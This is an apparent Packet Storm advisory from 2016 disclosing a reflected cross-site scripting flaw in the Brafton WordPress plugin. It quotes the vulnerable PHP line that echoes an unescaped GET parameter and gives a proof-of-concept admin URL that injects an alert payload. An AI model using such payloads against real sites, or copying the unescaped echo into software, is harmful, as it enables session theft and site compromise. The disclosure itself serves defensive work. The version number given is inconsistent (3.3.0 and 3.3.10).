WordPress Brafton plugin version 3.3.0 suffers from a cross site scripting vulnerability.
3892ab1d003f41f07168502f9e5f6aef23d2da0523045619b7f5cdae1c604776# Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin
# Date: Fri May 20 2016
# Reported Date : Fri May 20 2016
# Vendor Homepage: http://www.brafton.com/support/wordpress/
# Version: v3.3.10 – January2016
# Software Link:
https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Fix/Patching : Update To
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================
1. VULNERABILITY
-------------------------
brafton WordPress Plugin v3.3.10 – January2016
2. BACKGROUND
-------------------------
this is WordPress Plugin for Brafton
Brafton is a content marketing agency.
Our in-house teams develop and execute SEO-optimized content strategies,
from news to infographics
3. DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php
in line 11 :
tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo
0;}?>;
wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))
4. discovered by :
-------------------------
The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and
Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com
5 .LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed